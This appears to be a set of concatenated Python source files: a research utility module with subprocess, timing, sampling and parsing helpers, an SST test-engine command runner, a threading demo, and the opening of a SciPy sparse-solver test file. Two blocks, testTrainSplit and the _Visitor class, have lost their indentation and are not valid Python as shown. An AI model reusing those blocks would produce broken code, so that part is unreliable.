            handle.write(response.decode("utf-8"))
        raise e
    return response
    # }}}
class CompiledTimeout(Exception):
    # {{{
    """Raised when a callCompiled invocation exceeds its time budget."""
    # }}}
def get_root_dir():
    """
    Returns the path to the root directory of the repository as a string.
    This method is primarily used in order to locate the binaries at the root of the
    repository.
    """
    # {{{
    here = os.path.dirname(__file__)
    return os.path.join(here, os.pardir)
    # }}}
def get_data_dir():
    """
    Returns the path to the data directory of the repository as a string.
    """
    # {{{
    root = get_root_dir()
    return os.path.join(root, "data")
    # }}}
def callCompiled(f, *arguments, **keywordArguments):
    # {{{
    """Run f(*arguments, **keywordArguments) inside a pypy3 subprocess.

    The call is dill-serialized, piped to bin/compiledDriver.py, and the
    (success, result) pair is dill-deserialized from the child's stdout.
    Special keyword arguments (consumed here, not passed to f):
      profile: vmprof output path — profiles the pypy side.
      PIDCallBack: callable invoked with the child's PID once started.
      compiledTimeout: seconds before SIGALRM aborts the wait and the
        child is killed with CompiledTimeout raised.
    Exits this process (sys.exit(1)) when the child reports failure.
    """
    import dill
    pypyArgs = []
    profile = keywordArguments.pop("profile", None)
    if profile:
        pypyArgs = ["-m", "vmprof", "-o", profile]
    PIDCallBack = keywordArguments.pop("PIDCallBack", None)
    timeout = keywordArguments.pop("compiledTimeout", None)
    # Use absolute paths.
    compiled_driver_file = os.path.join(get_root_dir(), "bin", "compiledDriver.py")
    p = subprocess.Popen(
        ["pypy3"] + pypyArgs + [compiled_driver_file],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    if PIDCallBack is not None:
        PIDCallBack(p.pid)
    request = {
        "function": f,
        "arguments": arguments,
        "keywordArguments": keywordArguments,
    }
    start = time.time()
    dill.dump(request, p.stdin)
    # p.stdin.write(request)
    p.stdin.flush()
    # p.stdin.close()
    dt = time.time() - start
    if dt > 1:
        eprint(
            "(Python side of compiled driver: SLOW) Wrote serialized message for {} in time {}".format(
                f.__name__, dt
            )
        )
    if timeout is None:
        success, result = dill.load(p.stdout)
    else:
        eprint("Running with timeout", timeout)
        # SIGALRM-based deadline around the blocking read of the child's reply.
        def timeoutCallBack(_1, _2):
            raise CompiledTimeout()
        signal.signal(signal.SIGALRM, timeoutCallBack)
        signal.alarm(int(math.ceil(timeout)))
        try:
            success, result = dill.load(p.stdout)
            signal.alarm(0)
        except CompiledTimeout:
            # Kill the process
            p.kill()
            raise CompiledTimeout()
    if not success:
        sys.exit(1)
    return result
    # }}}
class timing(object):
    # {{{
    """Context manager that reports how long its body took via eprint.

    The message is either a fixed string or a callable mapping the
    elapsed seconds to a string.
    """
    def __init__(self, message):
        # {{{
        self.message = message
        # }}}
    def __enter__(self):
        # {{{
        self.start = time.time()
        return self
        # }}}
    def __exit__(self, type, value, traceback):
        # {{{
        dt = time.time() - self.start
        if callable(self.message):
            message = self.message(dt)
        elif isinstance(self.message, str):
            message = self.message
        else:
            assert False, "Timing message should be string function"
        eprint("%s in %.1f seconds" % (message, dt))
        # }}}
    # }}}
class random_seed(object):
    # {{{
    """Context manager that runs its body under a fixed random seed and
    restores the previous global random state on exit."""
    def __init__(self, seed):
        # {{{
        self.seed = seed
        # }}}
    def __enter__(self):
        # {{{
        self._savedState = random.getstate()
        random.seed(self.seed)
        return self
        # }}}
    def __exit__(self, type, value, traceback):
        # {{{
        random.setstate(self._savedState)
        # }}}
    # }}}
def randomPermutation(l):
    # {{{
    """Return a shuffled copy of `l`; the input is left untouched."""
    import random
    shuffled = list(l)
    random.shuffle(shuffled)
    return shuffled
    # }}}
def batches(data, size=1):
    # {{{
    """Yield the items of `data` in randomly permuted chunks of `size`
    (the final chunk may be shorter)."""
    import random
    # Randomly permute the data
    shuffled = list(data)
    random.shuffle(shuffled)
    for start in range(0, len(shuffled), size):
        yield shuffled[start : start + size]
    # }}}
def sampleDistribution(d):
    """
    Expects d to be a list of tuples
    The first element should be the probability
    If the tuples are of length 2 then it returns the second element
    Otherwise it returns the suffix tuple
    """
    # {{{
    import random
    total = float(sum(t[0] for t in d))
    if total == 0.0:
        eprint("sampleDistribution: z = 0")
        eprint(d)
    r = random.random()
    cumulative = 0.0
    last = len(d) - 1
    for index, t in enumerate(d):
        cumulative += t[0] / total
        # This extra condition is needed for floating-point bullshit
        if r <= cumulative or index == last:
            return t[1] if len(t) <= 2 else t[1:]
    assert False
    # }}}
def sampleLogDistribution(d):
    """
    Expects d to be a list of tuples
    The first element should be the log probability
    If the tuples are of length 2 then it returns the second element
    Otherwise it returns the suffix tuple
    """
    # {{{
    import random
    logZ = lse([t[0] for t in d])
    r = random.random()
    cumulative = 0.0
    for t in d:
        cumulative += math.exp(t[0] - logZ)
        if r < cumulative:
            return t[1] if len(t) <= 2 else t[1:]
    assert False
    # }}}
def testTrainSplit(x, trainingFraction, seed=0):
# {{{
if trainingFraction > 1.1:
# Assume that the training fraction is actually the number of tasks
# that we want to train on
trainingFraction = float(trainingFraction) / len(x)
needToTrain = {
j for j, d in enumerate(x) if hasattr(d, "mustTrain") and d.mustTrain
}
mightTrain = [j for j in range(len(x)) if j not in needToTrain]
trainingSize = max(0, int(len(x) * trainingFraction - len(needToTrain)))
import random
random.seed(seed)
random.shuffle(mightTrain)
training = set(mightTrain[:trainingSize]) | needToTrain
train = [t for j, t in enumerate(x) if j in training]
test = [t for j, t in enumerate(x) if j not in training]
return test, train
# }}}
def numberOfCPUs():
    # {{{
    """Number of logical CPUs reported by the OS."""
    from multiprocessing import cpu_count
    return cpu_count()
    # }}}
def loadPickle(f):
    # {{{
    """Deserialize and return the object stored in pickle file `f`."""
    with open(f, "rb") as handle:
        return pickle.load(handle)
    # }}}
def dumpPickle(o, f):
    # {{{
    """Serialize object `o` to file path `f` with pickle."""
    with open(f, "wb") as sink:
        pickle.dump(o, sink)
    # }}}
def fst(l):
    # {{{
    """First element of an iterable, or None when it is empty."""
    return next(iter(l), None)
    # }}}
def mean(l):
    # {{{
    """Arithmetic mean of an iterable; logs a warning and returns 0 when empty.

    Accumulates with `+` on the elements themselves, so it also works for
    vector-like values that define addition and division.
    """
    count = 0
    total = None
    for item in l:
        total = item if total is None else total + item
        count += 1
    if count == 0:
        eprint("warning: asked to calculate the mean of an empty list. returning zero.")
        return 0
    return total / float(count)
    # }}}
def variance(l):
    # {{{
    """Population variance of `l` (divides by len, not len - 1)."""
    m = mean(l)
    return sum((x - m) ** 2 for x in l) / len(l)
    # }}}
def standardDeviation(l):
    # {{{
    """Population standard deviation of `l`."""
    return variance(l) ** 0.5
    # }}}
def median(l):
    # {{{
    """Median of `l`; returns None for an empty sequence."""
    if not l:
        return None
    ordered = sorted(l)
    mid = len(ordered) // 2
    if len(ordered) % 2 == 1:
        return ordered[mid]
    return 0.5 * (ordered[mid] + ordered[mid - 1])
    # }}}
def percentile(l, p):
    # {{{
    """Value at fraction `p` of the sorted list; 0 when the index overflows."""
    ordered = sorted(l)
    idx = int(len(ordered) * p)
    return ordered[idx] if idx < len(ordered) else 0
    # }}}
def makeTemporaryFile(directory="/tmp"):
    # {{{
    """Create an empty temporary file in `directory` and return its path.

    The caller is responsible for deleting the file.
    """
    import tempfile
    descriptor, path = tempfile.mkstemp(dir=directory)
    os.close(descriptor)
    return path
    # }}}
class Stopwatch:
    # {{{
    """Accumulating stopwatch: start()/stop() may be paired repeatedly and
    `elapsed` reports the total running time in seconds."""
    def __init__(self):
        # {{{
        self._accumulated = 0.0   # seconds from completed start/stop spans
        self.running = False
        self._startedAt = None    # wall-clock start of the active span
        # }}}
    def start(self):
        # {{{
        if self.running:
            eprint(
                "(stopwatch: attempted to start an already running stopwatch. Silently ignoring.)"
            )
            return
        self.running = True
        self._startedAt = time.time()
        # }}}
    def stop(self):
        # {{{
        if not self.running:
            eprint(
                "(stopwatch: attempted to stop a stopwatch that is not running. Silently ignoring.)"
            )
            return
        self.running = False
        self._accumulated += time.time() - self._startedAt
        self._startedAt = None
        # }}}
    @property
    def elapsed(self):
        # {{{
        total = self._accumulated
        if self.running:
            total += time.time() - self._startedAt
        return total
        # }}}
    # }}}
def userName():
    # {{{
    """Login name of the current user."""
    import getpass
    name = getpass.getuser()
    return name
    # }}}
def hostname():
    # {{{
    """Network host name of this machine."""
    import socket
    name = socket.gethostname()
    return name
    # }}}
def getPID():
    # {{{
    """Process ID of the current process."""
    pid = os.getpid()
    return pid
    # }}}
def CPULoad():
    # {{{
    """System-wide CPU utilisation percent, or a note when psutil is missing."""
    try:
        import psutil
    except BaseException:
        return "unknown - install psutil"
    else:
        return psutil.cpu_percent()
    # }}}
def flushEverything():
    # {{{
    """Flush both stdout and stderr."""
    for stream in (sys.stdout, sys.stderr):
        stream.flush()
    # }}}
class RunWithTimeout(Exception):
    # {{{
    """Raised when runWithTimeout's CPU-time deadline expires."""
    # }}}
def runWithTimeout(k, timeout):
    # {{{
    """Run the thunk `k`, raising RunWithTimeout if it consumes more than
    `timeout` seconds of CPU time (measured with ITIMER_PROF/SIGPROF).

    k: zero-argument callable.
    timeout: seconds of CPU time, or None for no limit.
    Returns k's result; anything k raises propagates unchanged.
    Only usable from the main thread (installs a signal handler).

    Refactor: the original duplicated the cleanup in three branches and
    detached the handler *before* disarming the timer, leaving a window
    where a pending SIGPROF could hit the no-op handler of unrelated code.
    A single try/finally disarms the timer first, then detaches.
    """
    if timeout is None:
        return k()
    def timeoutCallBack(_1, _2):
        raise RunWithTimeout()
    signal.signal(signal.SIGPROF, timeoutCallBack)
    signal.setitimer(signal.ITIMER_PROF, timeout)
    try:
        return k()
    finally:
        signal.setitimer(signal.ITIMER_PROF, 0)
        signal.signal(signal.SIGPROF, lambda *_: None)
    # }}}
def crossProduct(a, b):
    # {{{
    """Yield every pair (x, y) with x from `a` and y from `b`.

    `b` is materialized up front so it may be a one-shot iterator.
    """
    ys = list(b)
    for x in a:
        for y in ys:
            yield x, y
    # }}}
class PQ(object):
    """Max-priority queue built on heapq, with insertion-order tie-breaking."""
    # {{{
    def __init__(self):
        # {{{
        self.h = []
        self.index2value = {}
        self.nextIndex = 0
        # }}}
    def push(self, priority, v):
        # {{{
        # Store (-priority, ticket): heapq is a min-heap, so negating the
        # priority pops the maximum first; the ticket breaks ties FIFO.
        ticket = self.nextIndex
        self.index2value[ticket] = v
        heapq.heappush(self.h, (-priority, ticket))
        self.nextIndex = ticket + 1
        # }}}
    def popMaximum(self):
        # {{{
        _, ticket = heapq.heappop(self.h)
        return self.index2value.pop(ticket)
        # }}}
    def __iter__(self):
        # {{{
        for _, ticket in self.h:
            yield self.index2value[ticket]
        # }}}
    def __len__(self):
        # {{{
        return len(self.h)
        # }}}
    # }}}
class UnionFind:
    # {{{
    """Union-find (disjoint sets) over arbitrary hashable keys.

    Each class tracks its member set; `unify` merges two classes and
    `otherMembers` returns every key in a key's class.

    Bug fixes vs. the original:
    * newClass used a bare `Class(x)`, which raised NameError because the
      nested class is only reachable as UnionFind.Class.
    * chase() unconditionally set `self.leader = k`, so a root ended up
      pointing at itself and every later chase() spun forever.
    """
    class Class:
        def __init__(self, x):
            # {{{
            self.members = {x}
            self.leader = None  # None while this node is its class's root
            # }}}
        def chase(self):
            # {{{
            """Follow leader pointers to the root, compressing this link."""
            k = self
            while k.leader is not None:
                k = k.leader
            # Only compress when we actually moved; a root must keep
            # leader=None or the loop above would never terminate.
            if k is not self:
                self.leader = k
            return k
            # }}}
    def __init__(self):
        # {{{
        # Map from keys to classes
        self.classes = {}
        # }}}
    def unify(self, x, y):
        # {{{
        """Merge the classes of x and y; returns the merged class."""
        k1 = self.classes[x].chase()
        k2 = self.classes[y].chase()
        # k2 will be the new leader
        k1.leader = k2
        k2.members |= k1.members
        k1.members = None
        self.classes[x] = k2
        self.classes[y] = k2
        return k2
        # }}}
    def newClass(self, x):
        # {{{
        """Register x in its own singleton class (no-op if already known)."""
        if x not in self.classes:
            self.classes[x] = UnionFind.Class(x)
        # }}}
    def otherMembers(self, x):
        # {{{
        """Return the member set of x's class (including x itself)."""
        k = self.classes[x].chase()
        self.classes[x] = k
        return k.members
        # }}}
    # }}}
def substringOccurrences(ss, s):
    # {{{
    """Count occurrences of `ss` in `s`, including overlapping ones."""
    return sum(1 for i in range(len(s)) if s.startswith(ss, i))
    # }}}
def normal(s=1.0, m=0.0):
    # {{{
    """Sample from a normal distribution via the Box-Muller transform.

    s: standard deviation; m: mean.
    """
    u, v = random.random(), random.random()
    z = math.cos(2.0 * math.pi * v) * math.sqrt(-2.0 * log(u))
    return m + s * z
    # }}}
def powerOfTen(n):
    # {{{
    """True iff n is a positive integer power of ten (1, 10, 100, ...).

    Uses integer floor division: the original divided with `/`, silently
    converting to float, whose rounding gives wrong answers for large
    inputs such as 10**30.
    """
    if n <= 0:
        return False
    while n % 10 == 0:
        n //= 10
    return n == 1
    # }}}
def powerOf(p, n):
    # {{{
    """True iff n is a positive integer power of base `p`.

    Uses integer floor division to stay exact for arbitrarily large ints
    (the original's `/` switched to floats and lost precision).
    """
    if n <= 0:
        return False
    while n % p == 0:
        n //= p
    return n == 1
    # }}}
def getThisMemoryUsage():
    # {{{
    """Resident set size (bytes) of the current process, via psutil."""
    import os
    import psutil
    return psutil.Process(os.getpid()).memory_info().rss
    # }}}
def getMemoryUsageFraction():
    # {{{
    """Percent (0-100) of system memory currently in use."""
    import psutil
    vm = psutil.virtual_memory()
    return vm.percent
    # }}}
def howManyGigabytesOfMemory():
    # {{{
    """Total physical memory in (decimal) gigabytes."""
    import psutil
    vm = psutil.virtual_memory()
    return vm.total / 10**9
    # }}}
def tuplify(x):
    # {{{
    """Recursively convert lists/tuples into nested tuples; leave others as-is."""
    if not isinstance(x, (list, tuple)):
        return x
    return tuple(map(tuplify, x))
    # }}}
# image montage!
def makeNiceArray(l, columns=None):
    # {{{
    """Chop the flat list `l` into rows of `columns` items each
    (defaults to roughly sqrt(len(l)) for a square-ish grid)."""
    if not l:
        return []
    width = columns or int(len(l) ** 0.5)
    return [l[i : i + width] for i in range(0, len(l), width)]
    # }}}
def montageMatrix(matrix):
    # {{{
    """Stitch a 2-D list of equally-shaped arrays into one big array,
    padding short rows with zero blocks on the right."""
    import numpy as np
    width = max(len(row) for row in matrix)
    cell_shape = matrix[0][0].shape
    cell_dtype = matrix[0][0].dtype
    blank = np.zeros(cell_shape, dtype=cell_dtype)
    rows = [
        np.concatenate(list(row) + [blank] * (width - len(row)), axis=1)
        for row in matrix
    ]
    return np.concatenate(rows, axis=0)
    # }}}
def montage(arrays, columns=None):
    # {{{
    """Arrange a flat list of equally-shaped arrays into one grid image."""
    grid = makeNiceArray(arrays, columns=columns)
    return montageMatrix(grid)
    # }}}
def showArrayAsImage(a):
    # {{{
    """Display array `a` as an image in a blocking matplotlib window."""
    import pylab
    pylab.imshow(a)
    pylab.show()
    # }}}
class ParseFailure(Exception):
    # {{{
    """Raised by parseSExpression on malformed or trailing input."""
    # }}}
def parseSExpression(s):
    # {{{
    """Parse a single S-expression from the string `s`.

    Returns nested lists for parenthesized expressions, strings for atoms,
    and ["#", e] for an expression prefixed with '#'.
    Raises ParseFailure on malformed input or trailing characters.
    """
    s = s.strip()
    def p(n):
        # Skip leading whitespace.  BUG FIX: the bound must be n < len(s);
        # the original `n <= len(s)` indexed one past the end, raising
        # IndexError instead of ParseFailure on truncated input like "(a".
        while n < len(s) and s[n].isspace():
            n += 1
        if n == len(s):
            raise ParseFailure(s)
        if s[n] == "#":
            e, n = p(n + 1)
            return ["#", e], n
        if s[n] == "(":
            l = []
            n += 1
            while True:
                x, n = p(n)
                l.append(x)
                # Skip whitespace before the next element or ')'.
                # (Same off-by-one fix as above.)
                while n < len(s) and s[n].isspace():
                    n += 1
                if n == len(s):
                    raise ParseFailure(s)
                if s[n] == ")":
                    n += 1
                    break
            return l, n
        # Atom: read up to whitespace or a parenthesis.
        name = []
        while n < len(s) and not s[n].isspace() and s[n] not in "()":
            name.append(s[n])
            n += 1
        name = "".join(name)
        return name, n
    e, n = p(0)
    if n == len(s):
        return e
    raise ParseFailure(s)
    # }}}
def diffuseImagesOutward(
    # {{{
    imageCoordinates,
    labelCoordinates,
    d,
    maximumRadius=2.5,
    minimumRadius=1.5,
):
    """Iteratively push the per-image offsets `d` apart so labels placed at
    imageCoordinates + d do not crowd each other.

    imageCoordinates: (n, 2) array of anchor positions.
    labelCoordinates: unused in this body — kept for interface compatibility.
    d: (n, 2) array of offsets, modified in place and returned.
    maximumRadius / minimumRadius: bounds on each offset's distance.
    NOTE(review): _constrainRadii compares the *squared* norm `r` against
    these radii but rescales by the true norm r**0.5 — the units look
    inconsistent; confirm the intent before reusing.
    """
    import numpy as np
    n = imageCoordinates.shape[0]
    # d = (np.random.rand(n,2)*2 - 1)*(maximumRadius/2 + minimumRadius/2)
    def _constrainRadii(p):
        # {{{
        # Clamp a single offset so its length stays within the radius band.
        r = (p * p).sum()
        if r > maximumRadius:
            return maximumRadius * p / (r**0.5)
        if r < minimumRadius:
            return minimumRadius * p / (r**0.5)
        return p
        # }}}
    def constrainRadii():
        # {{{
        # Apply the clamp to every offset row of d, in place.
        for j in range(n):
            d[j, :] = _constrainRadii(d[j, :])
        # }}}
    # Fixed number of repulsion/clamp relaxation sweeps.
    for _ in range(10):
        for i in range(n):
            force = np.array([0.0, 0.0])
            for j in range(n):
                if i == j:
                    continue
                p1 = imageCoordinates[i] + d[i]
                p2 = imageCoordinates[j] + d[j]
                l = ((p1 - p2) ** 2).sum() ** 0.5
                # Only nearby labels repel each other.
                if l > 1.5:
                    continue
                force += (p1 - p2) / l / max(l, 0.2)
            if force.sum() > 0:
                force = force / ((force * force).sum() ** 0.5)
            d[i] += force
        constrainRadii()
    return d
    # }}}
if __name__ == "__main__":
    # Smoke test: inflate memory with a deep binary tree, then report usage.
    def f(n):
        if n == 0:
            return None
        return [f(n - 1), f(n - 1)]
    z = f(22)
    # BUG FIX: getMemoryUsageFraction() returns a plain float percent, so
    # the original `.percent` attribute access raised AttributeError.
    eprint(getMemoryUsageFraction())
    eprint(getThisMemoryUsage())
|
test_engine_support.py | # -*- coding: utf-8 -*-
## Copyright 2009-2021 NTESS. Under the terms
## of Contract DE-NA0003525 with NTESS, the U.S.
## Government retains certain rights in this software.
##
## Copyright (c) 2009-2021, NTESS
## All rights reserved.
##
## This file is part of the SST software package. For license
## information, see the LICENSE file in the top level directory of the
## distribution.
""" This module provides the low level calls to the OS shell and other support
functions
"""
import sys
import os
import subprocess
import threading
import traceback
import shlex
import ast
import inspect
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
import test_engine_globals
################################################################################
class OSCommand():
    """ Enables to run subprocess commands in a different thread with a TIMEOUT option.
        This will return a OSCommandResult object.
        Based on a modified version of jcollado's solution:
        http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
    """
###
    def __init__(self, cmd_str, output_file_path=None, error_file_path=None,
                 set_cwd=None, use_shell=False):
        """
            Args:
                cmd_str (str): The command to be executed
                output_file_path (str): The file path to send the std output from the cmd
                                        if None send to stdout.
                error_file_path (str): The file path to send the std error from the cmd
                                       if None send to stderr
                set_cwd (str): Path to change dir to before running cmd; if None then
                               use current working directory.
                use_shell (bool): Execute the cmd using the shell (not recommended)
        """
        # Results are accumulated on the instance by the worker thread.
        self._output_file_path = None
        self._error_file_path = None
        self._cmd_str = None
        self._process = None
        self._timeout_sec = 60
        self._run_status = None
        self._run_output = ''
        self._run_error = ''
        self._run_timeout = False
        self._use_shell = use_shell
        self._set_cwd = set_cwd
        self._validate_cmd_str(cmd_str)
        self._output_file_path = self._validate_output_path(output_file_path)
        self._error_file_path = self._validate_output_path(error_file_path)
####
    def run(self, timeout_sec=60, **kwargs):
        """ Run a command then return an OSCommandResult object.
            Args:
                timeout_sec (int): The maximum runtime in seconds before thread
                                   will be terminated and a timeout error will occur.
                kwargs: Extra parameters passed to subprocess.Popen
        """
        # Explicitly reject bools: isinstance(True, int) is True in Python.
        if not (isinstance(timeout_sec, (int, float)) and not isinstance(timeout_sec, bool)):
            raise ValueError("ERROR: Timeout must be an int or a float")
        self._timeout_sec = timeout_sec
        # Build the thread that will monitor the subprocess with a timeout
        thread = threading.Thread(target=self._run_cmd_in_subprocess, kwargs=kwargs)
        thread.start()
        thread.join(self._timeout_sec)
        if thread.is_alive():
            # Deadline expired: kill the child and wait for the worker thread.
            self._run_timeout = True
            self._process.kill()
            thread.join()
        # Build a OSCommandResult object to hold the results
        rtn = OSCommandResult(self._cmd_str, self._run_status, self._run_output,
                              self._run_error, self._run_timeout)
        return rtn
####
    def _run_cmd_in_subprocess(self, **kwargs):
        """ Run the command in a subprocess (worker-thread target). """
        file_out = None
        file_err = None
        try:
            # Run in either the users choosen directory or the run dir
            if self._set_cwd is None:
                subprocess_path = test_engine_globals.TESTOUTPUT_RUNDIRPATH
            else:
                subprocess_path = os.path.abspath(self._set_cwd)
            # If No output files defined, default stdout and stderr to normal output
            if 'stdout' not in kwargs and self._output_file_path is None:
                kwargs['stdout'] = subprocess.PIPE
            if 'stderr' not in kwargs and self._error_file_path is None:
                kwargs['stderr'] = subprocess.PIPE
            # Create the stderr & stdout to the output files, if stderr path is
            # not defined, then use the normal output file
            if 'stdout' not in kwargs and self._output_file_path is not None:
                file_out = open(self._output_file_path, 'w+')
                kwargs['stdout'] = file_out
                if self._error_file_path is None:
                    kwargs['stderr'] = file_out
            if 'stderr' not in kwargs and self._error_file_path is not None:
                file_err = open(self._error_file_path, 'w+')
                kwargs['stderr'] = file_err
            self._process = subprocess.Popen(self._cmd_str,
                                             shell=self._use_shell,
                                             cwd = subprocess_path,
                                             **kwargs)
            self._run_output, self._run_error = self._process.communicate()
            self._run_status = self._process.returncode
            if self._run_output is None:
                self._run_output = ""
            if self._run_error is None:
                self._run_error = ""
        except:
            # Record the failure instead of letting the worker thread die silently.
            self._run_error = traceback.format_exc()
            self._run_status = -1
        # Close any open files
        if file_out is not None:
            file_out.close()
        if file_err is not None:
            file_err.close()
####
    def _validate_cmd_str(self, cmd_str):
        """ Validate the cmd_str and split it into an argv list. """
        if isinstance(cmd_str, str):
            if cmd_str != "":
                # shlex honors shell-style quoting while splitting.
                cmd_str = shlex.split(cmd_str)
            else:
                raise ValueError("ERROR: OSCommand() cmd_str must not be empty")
        else:
            raise ValueError("ERROR: OSCommand() cmd_str must be a string")
        self._cmd_str = cmd_str
####
    def _validate_output_path(self, file_path):
        """ Validate that the output file's directory exists; returns file_path. """
        if file_path is not None:
            dirpath = os.path.abspath(os.path.dirname(file_path))
            if not os.path.exists(dirpath):
                err_str = (("ERROR: OSCommand() Output path to file {0} ") +
                           ("is not valid")).format(file_path)
                raise ValueError(err_str)
        return file_path
################################################################################
class OSCommandResult():
    """ This class returns result data about the OSCommand that was executed """
    def __init__(self, cmd_str, status, output, error, timeout):
        """
            Args:
                cmd_str (str): The command that was executed
                status (int): The return status of the command execution.
                output (str): The standard output of the command execution.
                error (str): The error output of the command execution.
                timeout (bool): True if the command timed out during execution.
        """
        self._run_cmd_str = cmd_str
        self._run_status = status
        self._run_output = output
        self._run_error = error
        self._run_timeout = timeout
    ####
    def __repr__(self):
        fmt = ("Cmd = {0}; Status = {1}; Timeout = {2}; " +
               "Error = {3}; Output = {4}")
        return fmt.format(self._run_cmd_str, self._run_status,
                          self._run_timeout, self._run_error,
                          self._run_output)
    ####
    def __str__(self):
        return repr(self)
    ####
    def cmd(self):
        """ return the command that was run """
        return self._run_cmd_str
    ####
    def result(self):
        """ return the run status result """
        return self._run_status
    ####
    def output(self):
        """ return the run output result """
        # Sometimes the output can be a unicode or a byte string - convert it
        if PY3:
            if type(self._run_output) is bytes:
                self._run_output = self._run_output.decode(encoding='UTF-8')
            return self._run_output
        return self._run_output.decode('utf-8')
    ####
    def error(self):
        """ return the run error output result """
        # Sometimes the output can be a unicode or a byte string - convert it
        if PY3:
            if type(self._run_error) is bytes:
                self._run_error = self._run_error.decode(encoding='UTF-8')
            return self._run_error
        return self._run_error.decode('utf-8')
    ####
    def timeout(self):
        """ return true if the run timed out """
        return self._run_timeout
################################################################################
def check_param_type(varname, vardata, datatype):
    """ Validate a parameter to ensure it is of the correct type.

        Args:
            varname (str) = The string name of the variable
            vardata (???) = The actual variable of any type
            datatype (???) = The type that we want to confirm

        Raises:
            ValueError: variable is not of the correct type.
    """
    # The caller's function name makes the error message actionable.
    caller = inspect.stack()[1][3]
    if not isinstance(vardata, datatype):
        # Fixed message grammar ("is a not a" -> "is not a").
        err_str = (("TEST-ERROR: {0}() param {1} = {2} is not a {3}; it is a ") +
                   ("{4}")).format(caller, varname, vardata, datatype, type(vardata))
        print(err_str)
        raise ValueError(err_str)
################################################################################
def strclass(cls):
    """ Return the name of the module in which a class was defined"""
    return str(cls.__module__)
def strqual(cls):
    """ Return the qualified name of a class"""
    return str(_qualname(cls))
################################################################################
# qualname from https://github.com/wbolster/qualname to support Py2 and Py3
# LICENSE -> https://github.com/wbolster/qualname/blob/master/LICENSE.rst
#__all__ = ['qualname']
_cache = {}
def _qualname(obj):
    """Find out the qualified name for a class or function.

    On Python 3.3+ this is simply __qualname__; older interpreters fall
    back to re-parsing the defining source file and matching the object's
    line number against the AST (results cached per file in _cache).
    """
    # For Python 3.3+, this is straight-forward.
    if hasattr(obj, '__qualname__'):
        return obj.__qualname__
    # For older Python versions, things get complicated.
    # Obtain the filename and the line number where the
    # class/method/function is defined.
    try:
        filename = inspect.getsourcefile(obj)
    except TypeError:
        return obj.__qualname__  # raises a sensible error
    if not filename:
        return obj.__qualname__  # raises a sensible error
    if inspect.isclass(obj):
        try:
            _, lineno = inspect.getsourcelines(obj)
        except (OSError, IOError):
            return obj.__qualname__  # raises a sensible error
    elif inspect.isfunction(obj) or inspect.ismethod(obj):
        if hasattr(obj, 'im_func'):
            # Extract function from unbound method (Python 2)
            obj = obj.im_func
        try:
            code = obj.__code__
        except AttributeError:
            code = obj.func_code
        lineno = code.co_firstlineno
    else:
        return obj.__qualname__  # raises a sensible error
    # Re-parse the source file to figure out what the
    # __qualname__ should be by analysing the abstract
    # syntax tree. Use a cache to avoid doing this more
    # than once for the same file.
    qualnames = _cache.get(filename)
    if qualnames is None:
        with open(filename, 'r') as filehandle:
            source = filehandle.read()
        node = ast.parse(source, filename)
        visitor = _Visitor()
        visitor.visit(node)
        _cache[filename] = qualnames = visitor.qualnames
    try:
        return qualnames[lineno]
    except KeyError:
        return obj.__qualname__  # raises a sensible error
class _Visitor(ast.NodeVisitor):
"""Support class for qualname function"""
def __init__(self):
super(_Visitor, self).__init__()
self.stack = []
self.qualnames = {}
def store_qualname(self, lineno):
"""Support method for _Visitor class"""
q_n = ".".join(n for n in self.stack)
self.qualnames[lineno] = q_n
def visit_FunctionDef(self, node):
"""Support method for _Visitor class"""
self.stack.append(node.name)
self.store_qualname(node.lineno)
self.stack.append('<locals>')
self.generic_visit(node)
self.stack.pop()
self.stack.pop()
def visit_ClassDef(self, node):
"""Support method for _Visitor class"""
self.stack.append(node.name)
self.store_qualname(node.lineno)
self.generic_visit(node)
self.stack.pop()
|
thread_queue.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @File : thread_queue.py
# @Time : 2019/2/15 0:17
# @Author : MaiXiaochai
# @Site : https://github.com/MaiXiaochai
import time
import threading
import variables
"""
注意,这里如果写 import varibles.detail_url_list as url_list,
那么其他线程对detail_url_list的修改,在这里是看不到的。
所以,要用 import variables
"""
def get_detail_html(detail_url_list):
    # Article detail page: consume URLs from the shared list forever.
    # NOTE(review): busy-waits when the list is empty and never returns;
    # the popped `url` is never actually fetched (the sleep simulates work).
    while True:
        if detail_url_list:
            url = detail_url_list.pop()
            print("get detail html started.")
            time.sleep(2)
            print("get detail html end.")
def get_detail_url(detail_url_list):
    # Article list page: simulate a 4-second fetch, then push 20 detail
    # URLs onto the shared list for the consumer threads.
    print("get detail url started.")
    time.sleep(4)
    for i in range(20):
        detail_url_list.append("http://projeect/{}".format(i))
    print("get detail url end.")
def main_var():
    # Share the URL list with all threads through the `variables` module,
    # so every thread sees mutations of the same list object.
    thread_detail_url = threading.Thread(target=get_detail_url, args=(variables.detail_url_list, ))
    thread_detail_url.start()
    # Ten consumer threads; they never terminate (see get_detail_html).
    for i in range(10):
        html_thread = threading.Thread(target=get_detail_html, args=(variables.detail_url_list, ))
        html_thread.start()
    # NOTE(review): start_time is taken *after* the threads were started and
    # nothing is joined, so this prints ~0 rather than a total run time.
    start_time = time.time()
    print("last time: {}".format(time.time() - start_time))
|
test_linsolve.py | from __future__ import division, print_function, absolute_import
import warnings
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot, matrix
import numpy.random as random
from numpy.testing import (TestCase, run_module_suite,
assert_array_almost_equal, assert_raises, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose)
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu)
warnings.simplefilter('ignore',SparseEfficiencyWarning)
# TODO add more comprehensive tests
use_solver(useUmfpack=False)
def toarray(a):
    """Return `a` as a dense ndarray, converting sparse matrices; other
    inputs are passed through unchanged."""
    return a.toarray() if isspmatrix(a) else a
class TestLinsolve(TestCase):
    """Tests for scipy.sparse.linalg.dsolve.spsolve (SuperLU backend)."""
    def test_singular(self):
        """A singular (all-zero) system yields non-finite solution entries."""
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=MatrixRankWarning)
            A = csc_matrix((5,5), dtype='d')
            b = array([1, 2, 3, 4, 5],dtype='d')
            x = spsolve(A, b, use_umfpack=False)
            assert_(not np.isfinite(x).any())
    def test_singular_gh_3312(self):
